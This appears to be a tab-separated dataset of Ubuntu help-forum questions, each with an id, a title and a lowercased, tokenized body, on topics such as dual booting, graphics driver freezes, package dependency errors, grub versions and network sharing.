384902	authentication issue	i am trying to delete two partitions that are not used on my hard drive . i am using 13.10 - i go to disks then select the one i want to delete and a box appears asking for authentication , so i out in this password and yet it wont recognise it , suggestions , please . or just delete the entire system and start again ? shalom rik
384905	ubuntu 13.10 freezing and low graphics mode	i have installed ubuntu 13.10 64-bit on my desktop pc , and it seems it 's not working properly . i have freezing while typing , the virtual console is not available , if i try go to it my screen is freezing , also the cursor leaves a trace on the screen . i have tried to install nvidia graphics drivers ( from offsite , and from xorg repositories ) , but after it my ubuntu does n't boot . i see only a white blinking underline character cursor in top left corner of a black screen and nothing more . in that case i have to do a hard reboot , because the screen is frozen and i ca n't make my system respond in any other way . i also tried to install ubuntu 12.04 , but the loader gives a message about `` low graphics mode '' and after that i see only a black screen , and i can do nothing . for the moment i have reinstalled ubuntu 13.10 , and i am looking for an answer . can someone help me ? specifications of my pc : ⠀cpu : intel core i5-4670k ( haswell ) ⠀motherboard : asus gtx760-dc2oc-2gd5 ⠀graphics card : gigabyte g1.sniper b5
384907	sheepdog cluster	i 'm using a ubuntu 13.10 touch with a mate desktop on a 32-bit arm-system and have installed qemu and sheepdog , to use sheepdog in a 32-bit system i have this skript https : //github.com/sheepdog/qemu/blob/master/qemu-doc.texi but i do n't know where to get it or what to do ? if i start sheepdog with sudo /etc/init.d/sheepdog start i become an ok but when service sheepdog status he says sheepdog not running , i 've used this instruction http : //qemu-buch.de/de/index.php/qemu-kvm-buch/_speichermedien/_sheepdog ,
384908	issue with sha1 sum of windows iso with brasero	i downloaded windows7 iso from digitalriver ( official windows iso ) , the download was verified by sha1 fir integrity.no issue . then i write to dvd using brasero software . to check integrity of dvd , i copied it as image using brasero , copied image with filename udfvolume.iso , then i checked sha1 of the image , but it doesnt match with sha1 of the downloaded iso.tried writing three dvds to make sure its not issue of dvd . why this happened ? i tried the same method of copying my ubuntu cd as image and sha1 of it matches the downloaded iso
384909	i ca n't install sublime text2	i ca n't install sublime text2 using the command `` sudo apt-get install sublime-text '' . this command produse an error '' e : unable to locate package sublime-text '' . how can i install this ? plz hlp me ... ..
384917	dell inspiron 15z 5523 unable to have dual boot alongside with windows 8	i tried many times installing ubuntu along with windows 8.i tried many times and this should be the last try though .
384919	can i uninstall ubuntu from within windows ?	i was successfully using ubuntu for a while until after a silly mistake i deleted some files . i had the system running together with my windows but now i can not reboot in ubuntu , it gives me an error message and says that some files are missing : ( is there a way i can uninstall ubuntu from within windows ? or can i just install the same version of ubuntu ? would the two systems not collide ?
384923	sharing dualboot volumes space-efficiently	i plan to dualboot my system [ ubuntu|windows ] using a small ssd . what are the options to save space ? what i want is to have a either a \home as small as possible or a \home that i can use for both ubuntu and windows . should a use a virtual volume file inside ntfs partition as home folder ? this would be great for flexibility . is it possible to make it growing so i do n't have to size it in advance ? or should i better use a small /home partition and store all big files on windows ntfs partition ?
384927	fresh ubuntu install ( 12.04 ) , no internet	i just performed a fresh install of ubuntu 12.04.3 64-bit , and i can not connect to the internet . ubuntu is installed on its own partition , with windows 7 on the other . yet while i 'm able to connect to the internet using windows 7 , i am unable to do so using ubuntu . i use a linksys wireless-g usb network adapter dongle ( wusb54gc ) . it shows that i am successfully connecting to my router over wi-fi . i had successful internet connection when i was using the 32-bit version of ubuntu 12.04.3 . can you help ? thank you . edit 1 : nicholas @ nicholas : ~ $ ifconfig eth0 link encap : ethernet hwaddr 20 : cf:30:3f : fd:93 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:60 errors:0 dropped:0 overruns:0 frame:0 tx packets:60 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3808 ( 3.8 kb ) tx bytes:3808 ( 3.8 kb ) wlan0 link encap : ethernet hwaddr 00:22:6b:9e:38:92 inet addr:192.168.1.119 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :222:6bff : fe9e:3892/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:145 errors:0 dropped:0 overruns:0 frame:0 tx packets:127 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:23530 ( 23.5 kb ) tx bytes:17789 ( 17.7 kb )
384932	coming can not execute binary file when opening the cyberroam in beagle board xm	in our college we have cyberroam security for the internet , so to access internet we have to login to the cyberroam client , we are using beagle board xm for our project in which we have ported the ubuntu os , now we want to access internet in the beagle board xm , , we have installed cyberroam client and when we are giving the login id it is coming in the terminal that `` can not execute binary file '' , which software we have to install so that this error does not come
384934	gnu grub shows up , unbootable computer , help ! ! ,	so yesterday , i dual booted ubuntu and windows 8 , and i formatted the partition to ext2 , and i found out that ext4 is better so i decide to reinstall ubuntu . so following online instructions , i deleted linux partitions and i then use a flash drive to use the cmd , and typed in bootrec /fixboot and bootrec /fixmbr . so after that i shutdown the pc , and then i unplugged the flash drive , and powered on the computer . and after i power on , gnu grub version 2.00-19ubuntu2 showed up , and it said minimal bash-like line editing is supoorted . and since i do n't know how to use linux , i need help booting back to my windows 8 installation information : ubuntu 13.10 dual booting windows 8 motherboard uses uefi secure boot and fast boot are enabled . how to solve this ? edit : is it possible to access the uefi using the gnu grub ?
384935	java out of memory error during the installation processor of netbeans	i am getting java out of memory error when try to install netbeans . system : linux shantanu 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 x86_64 x86_64 gnu/linux ubuntu 13.10 download netbeans from here error log is here java -version java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.12 ) ( 7u25-2.3.12-4ubuntu3 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) what is the problem exactly ? ! how can i solve this problem ? i am also running eclipse smoothly .
384942	unity launcher not completely auto-hided	after updated from 13.04 to 13.10 , i get graphical errors when the launcher autohides : my problem is the brown bar in left side of screen , show in the pictures . if i right click the bar , the portion below the context menu disappears and is redrawn after a few seconds . i can not make a screenshot of that , when i press prtscr the bar is always redrawn . i think this is launcher 's background which is not removed when the launcher is hidden . i try run dconf reset -f /org/compiz/ - without effect . when i disable launcher auto-hiding everything works well . upd : in /etc/lightdm/lightdm.conf [ seatdefaults ] user-session=ubuntu greeter-session=unity-greeter solved : the problem was that the system was not set to the correct graphics driver . i had the `` vesa '' instead of `` intel driver . '' and 3d graphics acceleration is not working . after installing the driver intel , graphic bug disappeared .
384943	install a software without user interaction	background : i have made a shell script to install my software in linux ( ubuntu ) environment . i have to install few third party software as well . problem : since i run this shell script automatically ( this is working properly , no need to think about that ) , i need to remove the user interaction while installing the third part softwares such as apache2/ php . question : currently i 'm using apt-get install apache2 libapache2-mod-php5 php5 something like that . how can i avoid the user interaction ( press y to continue ) while installing ?
384944	facing problem during codeblocks uninstall ubuntu 13.10	i tried to install codeblocks ide which actually got terminated in the middle by throwing some problem after that i am not able to install any other software like flash player and the system is not able to uninstall it either , plz refer the messsage below reading state information ... done libwxgtk2.8-0 is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : codeblocks-contrib : depends : libgamin0 but it is not going to be installed depends : libhunspell-1.2-0 ( > = 1.2.11 ) but it is not installable depends : libwxsmithlib0 ( = 12.11-1 ) but 12.11-3 is to be installed depends : codeblocks ( = 12.11-1 ) but 12.11-3 is to be installed recommends : valgrind but it is not going to be installed recommends : cppcheck but it is not going to be installed recommends : cscope but it is not going to be installed recommends : cccc but it is not going to be installed libwxsmithlib0 : depends : libcodeblocks0 ( = 12.11-3 ) but 12.11-1 is to be installed recommends : codeblocks-contrib ( = 12.11-3 ) but 12.11-1 is to be installed libwxsmithlib0-dev : depends : libwxsmithlib-dev ( = 12.11-3 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
384948	can not access my localhost/version.php ? in ubuntu 13.04 , ,,	http : //zetcode.com/db/sqlitephp/ ( the tutorial in this link ) ... seriously can anyone help me with the php and sqlite3..assist me on how to link with sqlite3 and php ... i already installed all the required packages apache2 , libapache2-mod-php5 , php5-sqlite packages and of course sqlite3 ... < ? php echo sqlite_libversion ( ) ; echo `` < br > '' ; echo phpversion ( ) ; ? > this code above can not be shown in the localhost/version.php ... ..i got see other link but i can not understand wht they trying to say ... im quite blur and im still beginner to php and sqlite3 ... if got some additional codes or some editing please can anyone willing to share with me and give me step by step how to solve these problem ... please please please ... : ( : (
384951	ubuntu 13.10 - tp-link tl-wn7200nd	this is my first question since i 'm kinda new here . as stated in the title , i use a wireless adapter model number tp-link tl-wn7200nd . i use windows 8.1 as my main o.s and is in dual boot with ubuntu 13.10 . i 've searched but i could n't come up with a specific answer or solution to my problem . the thing is that for example , right now , i am in face inside ubuntu and using the internet connection just fine but sometimes it takes up to 3 or maybe more reboot intents to try to make it connect to the wireless . as sometimes it does just without problem . is this a driver problem or so ? is there anyway to ensure that i am always connected whenever i reboot/start up the computer ? also my wi-fi signal on windows 8 is 4/5 bars or complete while here , in ubuntu , is 2/5 what happens that in ubuntu i get less signal ? ( still works fine this is just a seek of knowledge . the main problem is the first one stated above ) .
384952	hplip will not open	i have just installed hplip using the ubuntu software centre in to 12.04lts . the icon has appeared in unity , but nothing happens when i click on it . i have run hp-check -t in terminal and get the following output : nigel @ nigel-f3se : ~ $ hp-check -t error : unable to locate models.dat file hp linux imaging and printing system ( ver . 0.0.0 ) dependency/version check utility ver . 14.3 copyright ( c ) 2011-14 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . note : hp-check can be run in three modes : 1 . compile-time check mode ( -c or -- compile ) : use this mode before compiling the hplip supplied tarball ( .tar.gz or .run ) to determine if the proper dependencies are installed to successfully compile hplip . 2 . run-time check mode ( -r or -- run ) : use this mode to determine if a distro supplied package ( .deb , .rpm , etc ) or an already built hplip supplied tarball has the proper dependencies installed to successfully run . 3 . both compile- and run-time check mode ( -b or -- both ) ( default ) : this mode will check both of the above cases ( both compile- and run-time dependencies ) . saving output in log file : hp-check.log initializing . please wait ... |traceback ( most recent call last ) : file `` /usr/bin/hp-check '' , line 206 , in < module > core.init ( ) file `` /usr/share/hplip/installer/core_install.py '' , line 412 , in init self.distro_name = self.distros_index [ self.distro ] keyerror : 0 i have hplip installed on two other computers using 12.04lts without this problem . any ideas or guidance would be much appreciated .
384953	make a radio station	at my school , last year , they created a radio station for european school radio . i saw that they used windows , and i am on linux . i want to see how can i create a radio but not online , i want to be heard on radios . how can it be done on ubuntu ? thanks . if you can give something to read , i really did n't find anything .
384958	strange icon for skype in system tray	when i start skype the following icon appears in the system tray . skype works fine and also if i click on the icon in the system tray , it is expanded to the full menu as usual . at some random time the icon changes to the usual green bubble with white checkmark . what 's wrong ? ps : i am running ubuntu 13.10 .
384959	how to reformat windows 7 and install ubuntu	ubuntu , how can i install you and remove my windows 7 in my pc ? my hard drives has been partitioned into drive c and d. i want to format drive c and install ubuntu in it without touching my drive d. because that 's where my files are . thanks ^^ also i do n't have any backup devices , so i need to install ubuntu without any backup . thank you ^^
384960	updation problem all the solution given wo n't work for me	w : gpg error : http : //extras.ubuntu.com precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : gpg error : http : //archive.canonical.com precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 w : gpg error : http : //in.archive.ubuntu.com precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //in.archive.ubuntu.com precise-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5
384965	xubuntu 's desktop behaves abnormally	my xubuntu used to work well but today it does n't seem good : as you can see , only a rectangle part is available now , the rest space is grey and right clicking the grey part does n't seem to work ... i 've tried cleaned my sessions and restart but it still wo n't work . is there anything i can do to fix it ? thank you ! edit 1 : xrandr -q output .xsession-errors
384967	is there any 'ubuntu 10.04 desktop ' theme available to make it look like windows 7 or windows8 ?	i want to know is there any theme available make it 'ubuntu 10.04 desktop ' look like windows 7 or windows8 ?
384969	make 'invisible ' folder for cryptkeeper	is it possible to hide the folder i am using for cryptkeeper ? ok , you do n't have access if not supplying the password but i do n't want the folder to be visible .
384970	detect intrusion with apache log ( ids )	i have an apache log . is there ane ids ( intrusion detecting system ) to detect intrusions in my server ? i just have an apache log
384974	ubuntu 13.10 low graphics error	i am complete noob on ubuntu and just tried to install ubuntu on the following spec machine : cpu - intel pentium 4 2.4ghz ram - 2gb ddr hdd - 80gb video card - integrated in via s3 savage 8 ( s3 prosavage ddr ) when i use the ubuntu live cd is all fine i can use the machine all okay etc.. however , as soon as i install ubuntu to the machine , at first i get an error like via-ircc device not available . then when it tries to login i get the message : `` the system is running in low graphics mode '' i tried going to the grub menu and selecting failsafex but still not luck all i get after the failesafex is black screen . ( as per how to fix `` the system is running in low-graphics mode '' error ? ) any ideas how i can get around this ? many thanks
384975	what does the commands `import gravity` and `import antigravity` do ?	i want to know the use of import gravity and import antigravity . is there any differences between these two commands ? man import shows : the import program is a member of the imagemagick ( 1 ) suite of tools . use it to capture some or all of an x server screen and save the image to a file . did the import gravity and import antigravity commands capture the x server screen ? if yes , then in what basis ? and where is the captured image stored ?
384976	grub menu ( while booting ) shows its grub2 though the version is 0.97	i had installed on my hard disk ubuntu 12.10 ( i think its grub version was 0.97 ) . then i upgraded to 13.04 . when now i run grub-install -v , it shows its grub 2.00 i later faced issue with ubuntu13.04 that i was n't able to boot . so using live ubuntu 12.10 cd , i reinstalled my grub . but then when the same command was run ( grub-install -v ) , it showed its grub 0.97 that means the live cd of ubuntu 12.10 had grub 0.97 . so , i used to work with this set up . [ now 1 serious point arises . does ubuntu 12.10 has grub version 0.97 ? because ubuntu site says that since ubuntu 9.10 ( karmic koala ) , its grub 2 ] but what i noticed that thought the command outputs grub version 0.97 , when i boot the system the boot menu shows grub 2.0 ( written at the top as heading ) . though its clear that my grub is 0.97 ( as confirmed by the command run in terminal ) , so that 's what i was thinking why the grub menu ( while booting ) shows the wrong version . what i think is that as my original o.s . ( 13.04 ) had grub 2.0 , so due to reinstalling grub from ubuntu12.10 ( which has grub version 0.97 ) , the boot-loader changed from grub 2.0 to grub version 0.97 but the heading remained unchanged . please focus some light on this . i would like to add that i followed ubuntu site and upgraded my grub from 0.97 to grub 2.0 . now i get the below output : ravbholua @ ravbholua-aspire-5315 : ~ $ grub-install -v grub-install ( grub ) 2.00-13ubuntu3 ravbholua @ ravbholua-aspire-5315 : ~ $ edit i have rechecked and found that i as ran sudo apt-get install grub with an intent to run grub command , i got grub legacy without my knowledge . yesterday i upgraded my grub from legacy to grub 2 . to test my question that i asked , just now i installed boot-loader from ubuntu 12.10 live cd . i checked via command line in the live cd the version of grub & it showed gnu grub version 2.00-7ubuntu11 . then i removed the live cd and rebooted . in the grub menu , it showed the same grub version as above i.e . gnu grub version 2.00-7ubuntu11 . but after logging , via command line it showed grub-install ( grub ) 2.00-13ubuntu3 . this is what the command line had output yesterday i.e . before i reinstalled grub today from live cd . why this diff . ?
384979	ca n't boot from live usb after boot-repair on 13.10 dual-boot win 8.1	my problem is that i need to install ubuntu 13.04 since my installation of the new ubuntu 13.10 is n't working for me due to unmet driver dependency on 13.10 . i 've got a dual-boot system running windows 8.1 uefi and ubuntu 13.10 . i 've got intel hd graphics 4600 and an nvidia optimus gt750 graphics card and none of the available drivers from both intel and nvidia are working for 13.10 and my hardware yet which results in fast battery consumption , overheating of the cpu and no webgl graphics on the browsers which is bad because i 'm into web development . i would like to be able to develop using a single operating system , both backend and frontend , instead of needing to boot into windows when needing to do frontend javascript and webgl work . thus , installing ubuntu 13.04 is necessary at the moment until intel and nvidia offer drivers for ubuntu 13.10 . i had to use boot-repair to fix grub after installing ubuntu 13.10 alongside win 8.1 and since then i 've not been able to boot into a live-usb containing ubuntu 13.04 . i 've tried both using a usb that was created using ubuntu 13.10 , and a usb created using windows 8.1 and when hitting f12 on my keyboard while booting the pc no usb option is available to boot from . only windows boot menu , ubuntu boot menu , and hdd . my question is : how do i repair my system so that i can boot from the live-usb ?
384984	packages supported until october 2013 ( 18m )	i m on ubuntu 12.04 and i get shown some packages from main are supported until october 2013 after running ubuntu-support-status . why is this , since main will get support til 2017 ? ! it states that - as an example - libenca0 - is only supported for 18 months although it sits in main ? is this a bug ? october 2013 is over now , obviously . apt-cache show libenca0 package : libenca0 priority : optional section : libs installed-size : 220 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : michal äihaĺ < nijel @ debian.org > architecture : i386 source : enca version : 1.13-4 depends : libc6 ( > = 2.4 ) filename : pool/main/e/enca/libenca0_1.13-4_i386.deb size : 62192 md5sum : dc1738e9af93e6a46258b794d444c73f sha1 : 5ab76251c991a9de868dc0a8927f899b385c09ac sha256 : 0d52c45d92b778a04f36b4c0c06aaf9a739203a06cb11e25e7bdfa7ce5f494d7 description-en : extremely naive charset analyser - shared library files enca is an extremely naive charset analyser . it detects the character set and the encoding of text files and can also convert them to other encodings . . this package contains the shared library needed to run applications compiled against libenca . homepage : http : //cihar.com/software/enca/ description-md5 : da9031e69c0ee3eed757fb4c01f3036d bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu supported : 18m task : mythbuntu-frontend , mythbuntu-frontend , mythbuntu-desktop , mythbuntu-backend-slave , mythbuntu-backend-slave , mythbuntu-backend-master , mythbuntu-backend-master , lubuntu-desktop , ubuntustudio-video , ubuntustudio-graphics
384987	how to maximize a minimzed program using command line knowing its pid ?	i need to maximize the window of an application when it 's minimized using the command line only.. so how to do that knowing the process id . when working on the wmctrl command i got the following error : x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 20 ( x_getproperty ) resource id in failed request : 0x6718 serial number of failed request : 11 current serial number in output stream : 11
384991	how to play audio file using c++ in linux	i am coding this c++ program .i want to play audio clip , format dose n't matter , its just i wrote hello word the most basic program of any language but the thing is instead of showing hello world on terminal screen i want a pre recorded hello audio clip to be played but do n't now hot to play audio clip via c++ . i m using kubuntu , a sample program showing solution will be preferred . thank you
384992	ca n't install ddd and insight	error of ddd mv -f .deps/signame.tpo .deps/signame.po g++ -dhave_config_h -i . -i./.. -o2 -g -wall -w -wwrite-strings -trigraphs -mt strclass.o -md -mp -mf .deps/strclass.tpo -c -o strclass.o strclass.c strclass.c : in function â€˜std : :istream & operator > > ( std : :istream & , string & ) â€™ : strclass.c:1546:35 : error : â€˜eofâ€™ was not declared in this scope strclass.c:1559:15 : error : â€˜eofâ€™ was not declared in this scope strclass.c : in function â€˜int readline ( std : :istream & , string & , char , int ) â€™ : strclass.c:1589:35 : error : â€˜eofâ€™ was not declared in this scope strclass.c:1602:15 : error : â€˜eofâ€™ was not declared in this scope make [ 2 ] : *** [ strclass.o ] error 1 make [ 2 ] : leaving directory `/home/haritha/desktop/ddd-3.3.12/ddd' make [ 1 ] : *** [ all ] error 2 make [ 1 ] : leaving directory `/home/haritha/desktop/ddd-3.3.12/ddd' make : *** [ all-recursive ] error 1 error of insight libtool : compile : gcc -dhave_config_h -i . -i.././bfd -i . -i . -i.././bfd -i.././bfd/../include -w -wall -wstrict-prototypes -wmissing-prototypes -werror -g -o2 -c elf64-x86-64.c -o elf64-x86-64.o elf64-x86-64.c : in function 'elf64_x86_64_relocate_section ' : elf64-x86-64.c:2364:16 : error : variable 'warned ' set but not used [ -werror=unused-but-set-variable ] elf64-x86-64.c:2807:29 : error : variable 'type2 ' set but not used [ -werror=unused-but-set-variable ] elf64-x86-64.c:3053:29 : error : variable 'type2 ' set but not used [ -werror=unused-but-set-variable ] elf64-x86-64.c:3053:23 : error : variable 'type ' set but not used [ -werror=unused-but-set-variable ] elf64-x86-64.c:3053:18 : error : variable 'val ' set but not used [ -werror=unused-but-set-variable ] elf64-x86-64.c:3084:23 : error : variable 'type ' set but not used [ -werror=unused-but-set-variable ] elf64-x86-64.c:3084:18 : error : variable 'val ' set but not used [ -werror=unused-but-set-variable ] cc1 : all warnings being treated as errors make [ 4 ] : *** [ elf64-x86-64.lo ] error 1 make [ 4 ] : leaving directory `/home/haritha/downloads/insight-6.8-1/bfd' make [ 3 ] : *** [ all-recursive ] error 1 make [ 3 ] : leaving directory `/home/haritha/downloads/insight-6.8-1/bfd' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/haritha/downloads/insight-6.8-1/bfd' make [ 1 ] : *** [ all-bfd ] error 2 make [ 1 ] : leaving directory `/home/haritha/downloads/insight-6.8-1' make : *** [ all ] error 2
384995	smb share in-accessible from any pc , mac , android	i used to share directories from ubuntu 12 to all other pcs on network , but since i clean-installed ubuntu 13.1 , shares are created and visible but they are in-accessible form the other machines when i access this from os x using password , authentication fails . when i login with guest user i get share listing : but i can not access any of them : problem is consistent when i access the share across os x , windows and android . how do i debug it ? here 's smb.log [ 2013/11/03 00:39:19.206526 , 0 ] param/loadparm.c:9114 ( process_usershare_file ) process_usershare_file : stat of /var/lib/samba/usershares/fxshare failed . permission denied
384996	what does my pythonpath contain ?	i work on some personal python libraries and i need to display what pythonpath contains and then manipulate it .
384997	apt-get does not find suggested package ( perf tool )	i am using performance counters ( https : //perf.wiki.kernel.org/index.php/main_page ) on ubuntu 13.10 x86_64 . if i type perf i get : perf not found for kernel 3.11.0-031100 you may need to install linux-tools-3.11.0-031100-generic but apt-get install ... does not find it e : unable to locate package linux-tools-3.11.0-031100-generic uname -r returns 3.11.0-031100-generic , i.e. , a slightly different kernel name ( ubuntu default is 3.11.0-13-generic ) how can i by default install the correct binaries matching the kernel ( and/or what repositories do i have to add for this ) ? ( i know i can work around this by compiling it from the kernel sources in /tools/perf/ ; this works , but ideally i want to have it done automatically via apt . )
385000	problem while recovering 1tb disk erased with startup disk creator using testdisk	i was trying to make a bootable flash drive from the startup disk creator , and when i went to erase the flash drive i accidentally erased the wrong drive , a 1tb removable drive . the operation took less than a second and gave no warning . i tried erasing the flash drive and it took about a minute , but it took but a second to erase the 1 tb drive , which is very surprising . i followed the following steps mentioned in this answer , but they did not work . after pressing p , testdisk just shows some files with garbage names . please help me to recover my data .
385003	is zenity progress bar affecting variables	hi guys i am currently trying to implement zenity progress bar to my while loop , however i noticed that my variable which are meant to be incremented did not increment . here is a sample test script i tried : i=0 p=0 while [ $ i -lt 10 ] do i= $ [ $ i + 1 ] echo $ i p= $ [ $ p + 1 ] done | ( zenity -- progress -- title= '' test '' -- text= '' test '' ) echo `` i : $ i p : $ p '' i noticed that the progress bar worked , however the variable p which is meant to be a counter was affected by zenity . is there something wrong with my code ? variable i is meant to echo the value in order to move the progress bar , while variable p is meant for other purposes . the values of p and i are both 0 despite incrementing it within the while loop . i am hoping that there is a way to make the variable p and i increment without removing the zenity progress bar . i am not sure why however , the incrementing of the variables work after the line ( zenity -- progress -- title= '' test '' -- text= '' test '' ) is removed addition how to use the variables i and p after the progress bar ended ? and one more question , is it required to enclose the while loop with ( ) ? thanks for any help !
385005	how to speed up the whole unity interface ?	how do i speed up the whole unity interface ?
385007	i cant install ubuntu using pendrive usb installer	i have tried countless times to install ubuntu to my laptop/ netbook , but to no avail , i have followed all the instructions on this page : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows ( i need to use a usb because my disk drive is broken ) every time i try , i get a message saying that windows is unable to open the file , and it had me download dynsite , and when i tried to find the file it said it didnt exist . so if someone could please help me that would be great , thanks !
385008	ca n't install g++ on 13.10 ( dependency problem )	i 'm a newbie and i 'm trying to make some c++ codes . i installed eclipse , but i ca n't install g++ and really do n't know why . my command is this . sudo apt-get install g++ however , it does n't work . error message is like this . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : g++ : depends : g++-4.8 ( > = 4.8.1-4~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . even google the omniscient does n't give me an answer ... i just found some bug reports by the message , and there is no answer for it . i know you guys are gurus : ) please help me .
385016	returning after vpn tunnel is up	i have a working teamcity setup for my projects on my local network using local resources like svn , web servers and database servers . now i want to be able to open a vpn tunnel to another network and then run a build from remote resources . i have the tunnel working using openvpn : sudo openvpn -- config client.ovpn my problem is that once the tunnel is open i want to be able to run the next step but the openvpn process needs to be running . is there a way to make a `` start script '' that does n't return until the tunnel is up and if so , how would i kill it ?
385017	ubuntu does not work	i have windows7 , i download ubuntu and then installed it from windows . the installation completed successfully within approximately 2 hours . i restarted my pc and selected ubuntu rather than windows7 , but ubuntu does not work and only a black screen with a write cursor appears . note : version : ubuntu-12.04.3-desktop-i386 what is the problem ? ?
385019	how do i see which softwares are installed in ubuntu ?	how can i get a list of my installed applications ?
385020	external drive , lost external hard drive	i have an external drive that will not mount or get recognised , how can i get access to this , it has all my files and music and i 'd really like to access this drive . [ 15878.044195 ] sd 5:0:0:0 : [ sdf ] [ 15878.044198 ] result : hostbyte=did_error driverbyte=driver_sense [ 15878.044200 ] sd 5:0:0:0 : [ sdf ] [ 15878.044203 ] sense key : hardware error [ current ] [ 15878.044207 ] sd 5:0:0:0 : [ sdf ] [ 15878.044210 ] add . sense : no additional sense information [ 15878.044213 ] sd 5:0:0:0 : [ sdf ] cdb : [ 15878.044215 ] read ( 10 ) : 28 00 00 00 00 63 00 00 04 00 [ 15878.044226 ] end_request : i/o error , dev sdf , sector 99 [ 15878.044231 ] buffer i/o error on device sdf1 , logical block 9
385022	desktop only shows from recovery mode in 13.10	i 've been having problems getting the ubuntu desktop to display on my macbook ( even the login screen ) . this periodically happens after updates -- when i load the newest kernel i just get a black screen . sometimes earlier kernels will work , but others may stop working too . i 've asked these similar questions : invalid rom contents preventing boot on macbook latest kernel not working currently , i can only get to the desktop if i boot from recovery mode . i do n't actually have to do anything while in recovery mode -- i just have to use it to boot . for example if i select 3.12 from grub , i 'll just get a black screen . i 'll be able to see the mouse and move it around , but the desktop never appears . if i select 3.12 ( recovery mode ) and then immediately select resume normal boot without doing anything else , the desktop will appear . is there anything i can do to skip the recovery mode step to boot to the desktop ?
385024	how to access /etc/ldap/slapd.conf file ?	i have to configure /etc/ldap/slapd.conf in ubuntu 12.04 . however , on installing slapd , i do not get the slapd.conf file . instead i am getting the /etc/ldap/slapd.d directory , which has files such as cn=config in it . how do i get access to the slapd.conf file ?
385027	maas node with another os ?	is it possible to install my own linux distribution in maas nodes ? my maas server is working well , but the nodes os is n't what i need . i need some normal os to run a applications with graphical interface . is this possible ?
385029	virtual box 4.3.4 ubuntu 13.10 blackscreens after login	i 've got a little problem with my ubuntu 13.10 . i have it installed on a vm , with windows 8.1 as host . until today everything went just fine , but all of sudden , when i host+f to get out of fullscreen mode , it took a while for it to get out of it , showing a blackscreen . when i got out of fullscreen and was on my desktop again ( win8 ) , i wanted to get into fullscreen again . so i host+f and nothing happened and the whole vm windows was just a black screen . i hope you can help me . i 've googled my problem , and found people who also had trouble with it and also blackscreened , but no solution helped me . thanks in advance
385038	dash home really long to show up	when i click on the dash home button , the search boax application is really long to appear ( around 5 seconds ) . how to remedy this ? thanks ubuntu 12.10 ( i do n't really want to upgrade it , because the last time i had to fresh install ... , so i am waiting for the next lts ) .
385039	if the maas server turns offline , the nodes also stop ?	i 'd like to have a system that when server turns offline , the nodes continue running the applications installed , and updating data between them . is that possible ?
385042	how many users can i create with useradd without having a visible performace degradation	assuming that i have a pc with 2ghz processor , 4gb ram . how many users can i create with useradd without noticing a visible change in performance in server file operations like ( copying files form one user to another , changing owners , etc . ) is is : 100 1000 10000 ... any experience with large number of users ?
385043	dual booting issue	i dual booted my new computer build with ubuntu 12.04 and windows 8 . now my ubuntu boots up but my windows will not . it sites and invalid efi path error . can some help ? i 've tried to use a boot repair disk with no luck . it 's my first build and i 'm super new to ubuntu and do n't know my way around much at all .
385047	if i install ubuntu over windows and i need to restore windows back to the laptop how do i do that ?	so the title says it all , if i install ubuntu over windows how do i re-install windows if i need to . i have not tried this as of yet , i was trying to see if someone was able to answer this question first .
385048	how do i start a second x server with a framebuffer driver ?	i would like to connect computer to a projector that has only a framebuffer driver . i was advised to start a second x server that would make use of this second `` videocard '' ( framebuffer driver for a projector , actually ) . how do i do that ? i 'm using ubuntu 13.04 64-bit .
385049	chap-secrets automatic add vpn users	i have a vpn server setup on ubuntu 12.04 , it is working great but i have a website and i want to implement a form on the website that adds the info type directly to chap-secrets the form now sends me an email in this form `` user l2tp pass //date `` i have to add the info manually . is there a way to link them together ? thank you !
385050	how to add pidgin to recognised devices on facebook ?	i 'm using facebook with pidgin messenger , and each time i log-in facebook sends me an sms telling me that an unrecognised device connected to my facebook acoount . i can use it , there 's no error on pidgin , but i keep receiving that annoying sms . i do n't want to disable this feature on facebook , i just want to add pidgin to the recognised devices .
